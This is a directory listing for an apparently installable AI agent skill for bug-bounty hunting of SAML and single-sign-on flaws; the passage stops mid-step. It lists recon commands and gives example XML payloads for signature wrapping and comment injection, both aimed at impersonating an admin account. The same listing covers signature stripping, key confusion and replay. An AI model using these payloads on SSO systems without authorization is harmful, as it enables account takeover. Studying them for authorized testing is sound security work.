← ClaudeAtlas

hunt-samllisted

Hunt SAML / SSO attacks. Patterns: XML Signature Wrapping (XSW1-XSW8) — modify Assertion while keeping Signature valid by relocating signed element, comment injection in NameID (admin@target.com<!--evil-->@attacker.com → some parsers see admin@target.com), signature stripping (remove Signature element entirely, server should reject but doesn't), key confusion (signed by attacker's IdP, accepted by SP), audience-restriction not validated, replay attack (same Assertion accepted twice within validity window). Tools: SAML Raider Burp extension, samlmagic, manual XML manipulation. Detection: any /saml endpoint, /Shibboleth.sso, /sso/saml/, Microsoft ADFS endpoints. Validate: account takeover via altered NameID, admin role injection via altered AttributeStatement. Real paid examples on Auth0, Okta, Microsoft, custom SAML implementations. Use when hunting SSO flows, when SAML AssertionConsumerService is reachable, when chaining IdP-trust to SP-impersonation.
elementalsouls/Claude-BugHunter · ★ 1,240 · API & Backend · score 82
Install: claude install-skill elementalsouls/Claude-BugHunter
## 20. SAML / SSO ATTACKS > SSO bugs frequently pay High–Critical. XML parsers are notoriously inconsistent. ### Attack Surface ```bash # Find SAML endpoints cat recon/$TARGET/urls.txt | grep -iE "saml|sso|login.*redirect|oauth|idp|sp" # Key endpoints: /saml/acs (assertion consumer service), /sso/saml, /auth/saml/callback ``` ### Attack 1: XML Signature Wrapping (XSW) ```xml <!-- BEFORE: valid assertion by user@company.com --> <saml:Response> <saml:Assertion ID="legit"> <NameID>user@company.com</NameID> <ds:Signature><!-- Valid, covers ID=legit --></ds:Signature> </saml:Assertion> </saml:Response> <!-- AFTER: inject evil assertion. Signature still validates (covers #legit). App processes the FIRST assertion found = evil. --> <saml:Response> <saml:Assertion ID="evil"> <NameID>admin@company.com</NameID> <!-- Attacker-controlled --> </saml:Assertion> <saml:Assertion ID="legit"> <NameID>user@company.com</NameID> <ds:Signature><!-- Valid --></ds:Signature> </saml:Assertion> </saml:Response> ``` ### Attack 2: Comment Injection in NameID ```xml <!-- XML strips comments before passing to app --> <NameID>admin<!---->@company.com</NameID> <!-- Signature computed over: "admin@company.com" (with comment) --> <!-- App receives: "admin@company.com" (comment stripped) --> <!-- Works when signer and processor handle comments differently --> ``` ### Attack 3: Signature Stripping ``` 1. Decode SAMLResponse: echo "BASE64" | base64 -d | xmllint --format